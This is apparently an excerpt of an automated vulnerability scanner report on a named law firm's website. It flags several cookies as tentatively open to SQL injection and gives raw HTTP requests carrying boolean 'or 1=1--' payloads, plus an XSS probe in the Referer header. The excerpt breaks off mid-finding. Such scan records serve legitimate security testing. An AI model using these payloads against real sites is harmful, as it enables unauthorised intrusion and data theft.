Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.27. http://www.pillsburylaw.com/a [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 11939842%20or%201%3d1--%20 and 11939842%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953711939842%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Thu, 13-May-2010 00:35:53 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953711939842%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11834516;path=/
Set-Cookie: CFTOKEN=68084189;path=/
Date: Fri, 13 May 2011 00:35:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.28. http://www.pillsburylaw.com/a [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 23034469%20or%201%3d1--%20 and 23034469%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898823034469%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Thu, 13-May-2010 00:36:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898823034469%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11834548;path=/
Set-Cookie: CFTOKEN=88941658;path=/
Date: Fri, 13 May 2011 00:36:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.29. http://www.pillsburylaw.com/a [MEDIAUSERID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 10682232'%20or%201%3d1--%20 and 10682232'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=10682232'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Thu, 13-May-2010 00:36:36 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=10682232'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.30. http://www.pillsburylaw.com/a [MEDIAUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 14521441'%20or%201%3d1--%20 and 14521441'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=14521441'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Thu, 13-May-2010 00:36:46 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=14521441'%20or%201%3d2--%20; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.31. http://www.pillsburylaw.com/a [PCONNECTID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 67778256'%20or%201%3d1--%20 and 67778256'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=67778256'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
